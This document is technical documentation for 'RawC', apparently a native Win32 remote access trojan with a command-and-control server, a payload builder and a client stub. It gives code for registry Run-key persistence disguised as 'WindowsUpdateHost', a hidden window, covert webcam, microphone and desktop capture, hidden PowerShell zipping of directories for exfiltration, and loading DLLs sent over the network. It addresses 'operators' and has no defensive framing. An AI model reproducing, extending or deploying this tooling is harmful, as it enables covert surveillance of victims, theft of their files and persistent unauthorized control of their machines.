RawC Framework Documentation

Welcome to the technical documentation for the native Win32 C/C++ Client & Server framework. This document details the internal architecture, payload generation mechanics, and multimedia API integrations used throughout the native codebase.

Environment Constraints: Compiled strictly as C/C++ using the MSVC compiler. Zero external dependencies required. Bypasses bulky runtimes (.NET, Java) by interacting directly with the native Windows API.

Architecture Overview

The system utilizes a centralized Command & Control (C2) TCP socket architecture. The Server.cpp binds a listener and spawns worker threads for concurrent client management. The Client.cpp stub operates a continuous reconnection loop, parsing incoming binary opcodes to execute distinct subsystem threads concurrently (e.g., File I/O, Video Capture, Audio Capture).

Network Protocol

To avoid TCP fragmentation and buffer overflows, all communications utilize a strict header definition. The receiver parses the header to determine the exact byte length of the incoming payload before allocating memory.

// Standard Packet Header Structure
typedef struct _PACKET_HEADER {
    DWORD MagicNumber;  // Verification (e.g., 0xDEADBEEF)
    DWORD Opcode;       // Command identifier
    DWORD DataLength;   // Size of payload to recv()
} PACKET_HEADER, *PPACKET_HEADER;

Core Opcodes

Opcode ID	Definition	Subsystem Invoked
`0x10`	OP_START_RDP	Spawns GDI+ Capture Thread
`0x20`	OP_START_CAM	Initializes Media Foundation Graph
`0x30`	OP_START_MIC	Opens WaveIn Audio Device
`0x40`	OP_FILE_UPLOAD	Initiates Chunked TCP File Write
`0x45`	OP_DIR_ZIP	Spawns hidden PowerShell process
`0x50`	OP_INJECT_DLL	Executes memory LoadLibrary flow

Initialization & Mutex Client.cpp

The client is designed to execute cleanly and reliably. It achieves process state management by registering a hidden window class, and employs a system-wide Mutex to prevent overlapping socket connections. Below is the actual WinMain initialization routine.

void CheckMutex() {
    CreateMutexA(NULL, TRUE, MUTEX_STRING);
    if (GetLastError() == ERROR_ALREADY_EXISTS) ExitProcess(0);
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    CheckMutex();
    InitializeCriticalSection(&sendCS);

    // Initialize Hardware Webcam API
    MFStartup(MF_VERSION);

    // Initialize GDI+ for Remote Desktop Capture
    GdiplusStartupInput gdiplusStartupInput;
    ULONG_PTR gdiplusToken;
    GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);

    // Initialize Winsock
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    // Register Hidden Window to maintain message pump
    WNDCLASSEXA wc = { sizeof(WNDCLASSEXA), 0, HiddenWndProc, 0, 0, hInstance, NULL, NULL, NULL, NULL, "HiddenTrayClass", NULL };
    RegisterClassExA(&wc);
    hHiddenWindow = CreateWindowExA(0, "HiddenTrayClass", "", 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL);
    
    // ... Start Reconnect Loop ...
}

Automated Payload Builder Builder.exe

The framework includes a standalone GUI Builder utility. Instead of manually editing the `SERVER_IP` and `SERVER_PORT` variables in the C++ headers, operators can configure connection routing, unique Mutex strings, and installation directories via the interface. The builder dynamically patches these values into a pre-compiled stub or initiates an MSVC command-line compilation.

Registry Persistence

If persistence is enabled via the Builder, the stub clones itself to the specified hidden directory (e.g., %AppData%) and modifies the Windows Registry to execute automatically upon user login.

HKEY hKey;
const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

if (RegOpenKeyExA(HKEY_CURRENT_USER, path, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
    RegSetValueExA(hKey, "WindowsUpdateHost", 0, REG_SZ, 
                  (const BYTE*)targetInstallPath, strlen(targetInstallPath) + 1);
    RegCloseKey(hKey);
}

GDI+ Remote Desktop

Desktop capture relies on the GDI API. GetDC(NULL) acquires the screen handle. To minimize bandwidth, the raw bitmap is passed to the Gdiplus API, which hardware-encodes the frame into a compressed JPEG buffer in memory before network transmission.

Hardware Webcams (MF API)

Unlike older frameworks that use the deprecated `avicap32.dll`, this codebase implements the modern Media Foundation (MF) API. This provides hardware-accelerated access to connected webcams, allowing for high-framerate, YUY2-to-JPEG conversion directly on the GPU.

// Required Initialization for Webcam Module
MFStartup(MF_VERSION);
IMFAttributes* pConfig = NULL;
MFCreateAttributes(&pConfig, 1);
pConfig->SetGUID(MF_DEVSOURCE_ATTRIBUTE_SOURCE_TYPE, MF_DEVSOURCE_ATTRIBUTE_SOURCE_TYPE_VIDCAP_GUID);

// Enumerate Devices
IMFActivate** ppDevices = NULL;
UINT32 count = 0;
MFEnumDeviceSources(pConfig, &ppDevices, &count);

Live Audio (WaveIn)

The audio pipeline utilizes the mmsystem.h Wave API. The client allocates rolling buffers, submits them to the microphone via waveInAddBuffer, and transmits the raw PCM byte arrays to the server upon the WIM_DATA callback.

Chunked File Manager

Large files (gigabytes in size) cannot be sent in a single socket call. The framework implements a Chunked TCP file transfer loop. The file is opened using CreateFileA, read in chunks (e.g., 64KB), and sent with sequence headers until EOF is reached.

PowerShell Auto-Zipping

To exfiltrate or download entire directories efficiently, the framework avoids writing a complex C zipping library. Instead, it utilizes the Windows native environment by spawning a hidden PowerShell process using CreateProcessA with the CREATE_NO_WINDOW flag.

// Constructed command line executed silently
char* cmd = "powershell.exe -WindowStyle Hidden -Command Compress-Archive -Path 'C:\\Target\\*' -DestinationPath 'C:\\Temp\\out.zip' -Force";

Dynamic DLL Injection

The framework acts as a modular stub. It can receive a compiled DLL file over the network, save it to a temporary directory (or hold it in memory), and dynamically load it into its own process space using standard Win32 APIs, thereby extending the client's capabilities without recompiling.

// Dynamic Plugin Loading
HMODULE hPlugin = LoadLibraryA("C:\\Temp\\plugin.dll");
if (hPlugin != NULL) {
    typedef void (*PluginEntryFunc)();
    PluginEntryFunc Entry = (PluginEntryFunc)GetProcAddress(hPlugin, "StartPlugin");
    if (Entry) {
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Entry, NULL, 0, NULL);
    }
}

HTTP MJPEG Server Server.cpp

The Server instance simultaneously acts as a bridge. While it receives proprietary TCP packets containing JPEG frames from the Client, it listens on port 8080 for HTTP GET requests. It wraps the incoming JPEGs in a multipart/x-mixed-replace HTTP header, allowing operators to view the live desktop or webcam feeds seamlessly in Chrome, Firefox, Safari, or VLC Media Player.